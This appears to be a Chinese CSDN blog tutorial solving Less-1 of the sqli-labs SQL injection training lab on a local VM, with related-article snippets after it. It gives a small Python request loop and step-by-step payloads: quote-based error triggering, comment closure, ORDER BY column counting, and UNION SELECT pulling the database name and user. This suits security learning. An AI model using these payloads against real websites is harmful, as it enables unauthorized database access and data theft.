sqli-labs-master第一关Less-1超详细360°无死角教程

已于 2023-11-22 14:49:23 修改
阅读量310 收藏 1
点赞数 7
文章标签: 前端 网络安全 mysql
于 2023-11-21 22:26:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hih30250/article/details/134542341
版权

sqlmaster第一关Less-1

测试IP:http://192.168.64.131 目录:/sqlmaster/Less-1/
  • 由于直接在浏览器注入数据时一些符号采用十六进制表示,看着很花,所以我们直接在python中测试注入

编写简易python网页请求代码:

import requests
import parsel
import re
print("http://192.168.64.131/sqlmaster/Less-1/")
while True:
    inject_code = input(">>>")
    url = f"http://192.168.64.131/sqlmaster/Less-1/{inject_code}"
    try:
        url_get = requests.get(url)
    except:
        print("[-]主机未上线!")
        continue
    Less_1_data = url_get.text
    selctors = parsel.Selector(Less_1_data)
    data = selctors.xpath('/html/body/div/font[2]').getall()
    try:
        data =str(re.findall('<font size="3" color="#FFFF00">(.*?)</f',str(data))[0])
    except:
        print("Error : 404 Not Found")
        continue
    if "\\r" in data and "\\n" in data and "<br>" in data:
        data = data.replace("\\r","")
        data = data.replace("\\n","")
        data = data.replace("<br>","\r\n")
    elif "\\r" in data and "\\n" in data and "\\'\\" in data:
        data = data.replace("\\r","")
        data = data.replace("\\n","")
        data = data.replace("\\","")
    elif "\\r" in data and "\\n" in data:
        data = data.replace("\\r","")
        data = data.replace("\\n","")
    else:
        exit()
    print(data)

效果如图:

     在这里插入图片描述
额。。。可能简陋了点,但并不妨碍我们练习。

开始测试

由前面的图可以看到,当我们输入:?id=1的时候,页面给出了正常的数据
那么这个时候我们尝试加入“'”:

     在这里插入图片描述
可以看到页面将错误的信息打印了出来,告诉我们是因为多了一个分号而导致的,那么我们就将我们输入的分号变为有效的让页面php代码给出的分号变为无效的。

我们键入:?id=1' --+

效果如图:
     在这里插入图片描述

--”代表注释后面的语句,“+”代表空格,避免字符串拼接使注释语法失效

这时,代表“'”后面可以写入我们的注入语句,我们可以先判断字段数量:

键入:?id=1'order by [number] --+ ,number代表任意数字

效果如图:

     在这里插入图片描述

可以看到,当我们查看id=1的order by 到4的字段时报错了,所以字段数是3

接下来就好办了,我们使用union注入

键入:?id=555'union select 1,2,3 --+ 这里的 ?id=555'也可以替换为?id=1' and 1=2只要让主查询语句返回False就可以了

效果如图:

     在这里插入图片描述

可以看到,在字段2,3中可以注入查询命令查看数据

接着键入:?id=555'union select 1,database(),user() --+ 来获取当前数据库的名称以及数据库的用户名

效果如图:

     在这里插入图片描述

  • 注入成功,第一关通过!
anonymous_who_am_i
关注
  • 7
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
sqli-labs-master第一关Less-1Error based - Single quotes - String
weixin_45492475的博客
08-19 341
sqli-labs-master第一关Less-1Error based - Single quotes - String 一、首先进入目标网站,查看显示输入正确时的页面 根据下面提示,输入id值,当我们输入?id=1时得到了一个正确的返回界面 二、判断注入点 1、?id=1’ 判断注入点处是数字型还是字符型,在正确语句后加入一个单引号后,发现报错信息为 ‘‘1’’ LIMIT 0,1’ at...
sql注入及sqli-labs-master/Less-1题解析
weixin_43948394的博客
07-20 587
sql注入 group_concat(str1,str2,…)——连接一个组的所有字符串,并以逗号分隔每一条数据。 mysql中的information_schema 结构用来存储数据库系统信息information_schema 结构中这几个表存储的信息。 database()——数据库名。 可以选择一个数据库名来进行查询 如:security 查询语句:use security; 查询这个数...
sqli-labs-master【Less-1】
weixin_44352521的博客
12-04 271
首先在虚拟机中安装好Metasploitable2的靶机,然后查看地址,在浏览器的地址栏中输入:http://192.168.228.129/sqli-labs-master/Less-1/ 这里呢,我们可以先参照源码进行一步步渗透和注入! 可以看到$id是我们要输入的变量 sqli-labs-master/Less-1/ 1. 在地址栏中的URL后输入?id=1 http://192.168...
sqli-labs-master Less-1
Risker
04-10 1075
提示提交id值,用单引号试一下,报错:猜测id值在查询语句中被单引号包裹。接下来用order by测字段数 测出3个字段。然后看当前的数据库,构造payload:http://127.0.0.1/sqli-labs-master/Less-1/?id=1'  union select 1,1,database() %23给我返回了这个id=1的值:要执行union后的语句就要让union前的查询语...
Sqli-labs-master注入详解:less-01
weixin_43096078的博客
08-24 561
通过学习sql注入,提高安全意识,切勿违法操作! 通过sqli-labs学习sql注入的第一天: 在学习之前需要先掌握一些基本知识: 连接数据库:mysql -uroot -p 回车 输入mysql密码 (root是对应的用户名) 查数据库:show databases; (会发现mysql自带了几个数据库,它们尤其相应的作用,建议查阅资料了解下什么意思) 使用某一个数据库:use database_name; (database_name是库名) 查询数据库中的表:show tables; 查看
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master
08-22
sqli-labs-master是一个练习sql注入的代码环境
sqli-labs less-1
zbbjya的博客
02-08 408
请输入id作为带数值的参数 ==================================================----------======= 输入 ?id=1 我们会看到这个sql语句是我们添加进去的,原本是应该没有的 limit 0.1;其中第一位是从第几个开始的,比如0代表从第一个开始,而第二位的1代表的就是显示多少个数据 再输入加一个单引号我们会发现报错了 ​ ?id=1' 一个一个的试 127.0.0...
sqli-labs-master-源码审计(less-1-7)
忘忧的博客
04-04 4242
less-1先看源码,查看重点代码,sql传参没有进过任何过滤 使用语句:单引号判断:http://127.0.0.1/sqli-labs-master/Less-1/?id=1’判断字段:http://127.0.0.1/sqli-labs-master/Less-1/?id=1’order by 4 --+判断注入位置:http://127.0.0.1/sqli-labs-master/Less-1/?id=-1’union select 1,2,3 --+获取信息:http://127.0.0.1/
sqli-labs通关(less1~less10)
热门推荐
箭雨镜屋
08-16 1万+
这10关都是GET型的,包括了union注入、报错注入、布尔盲注和时间盲注,虽然包含了几种闭合方式,但是没有涉及到过滤和绕过,是最基础的关卡。
sqli-labs-less-1完整解析,小白干货
yzcn
10-22 1922
Less-1 Sql知识点: Limit(x,y):从x+1行开始输出,共输出y行 Order by:排序,asc升序(默认),desc(降序) Union:MySQL执行两条SELECT语句,并把输出组合成单个查询结果集 Group_concat:连接作用,group_concat( 要连接的字段 ) [Order BY 排序字段 ASC/DESC] [Separator ‘分隔符’] concat_ws:concat_ws(‘-’,a,b) 将a和b用-连接起来 MySQL中默认建立的数据库:
小白日记 0day sqli-labs-master/less 1~4
weixin_40514070的博客
09-15 148
SQL注入漏洞注入原理 SQL注入(英语:SQL injection),也称SQL注入或SQL注码,是发生于应用程序与数据库层的安全漏洞。简而言之,是在输入的字符串之中注入SQL指令,在设计不良的程序当中忽略了字符检查,那么这些注入进去的恶意指令就会被数据库服务器误认为是正常的SQL指令而运行,因此遭到破坏或是入侵。[摘自wiki] 我们知道SQL注入有很多种方法,所以以下就示 ...
Sqli-lab:Less-1教程
最新发布
m0_72286569的博客
01-28 560
1,当输入时会显示显示对应的Login name与Password,可以证明我们输入的内容是在数据库里面查询2,判断SQL语句是否是拼接a,当我们输入1’时会报错b,当我们输入1'--+时不会报错,就可以使用联合查询的方式进行sql注入。
Sqli-labs-master的环境搭建
m0_52505633的博客
04-10 2396
Sqli-libs是一位印度程序员写的,用来学习SQL注入的一个游戏教程。它是一个非常好的SQL注入学习实战平台,涵盖了报错注入、盲注、Update注入、Insert注入、Heather注入、二阶注入、绕过WAF,比较全面的一个注入平台。本次在phpstudy环境上部署sqli-labs 注入平台。 本次安装是在虚拟机中windows10安装 ----注释---- phpstudy和sqli-labs等学习环境、靶场、工具尽量安装在虚拟机中,以免某些设置、端口忘记关闭,会存在安全隐患,包括一些软件本.
sqli-labs 通关笔记详解 Less1 - Less10
HAKUNAMATATATTA的博客
12-18 2766
sqli-labs靶场之前建议补一下基础。
sqli-labs-master/Less-17
07-28
Less-17 是一个 SQL 注入实验,它位于 sqli-labs-master 实验室的目录中。在这个实验中,你可以学习和实践 SQL 注入攻击的技术。 SQL 注入是一种常见的网络安全漏洞,它允许攻击者通过在应用程序的输入字段中注入恶意的 SQL 代码来执行未经授权的操作。通过利用这个漏洞,攻击者可以绕过应用程序的认证机制、获取敏感数据或者修改数据库中的内容。 在 Less-17 中,你将面对一个存在 SQL 注入漏洞的应用程序。你需要通过注入恶意的 SQL 代码来绕过应用程序的认证机制,以获取管理员权限。 注意:SQL 注入是一种非法行为,只能在合法的环境下进行学习和实验。在现实世界中,从事任何形式的黑客攻击都是违法行为,请始终遵守法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

anonymous_who_am_i

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值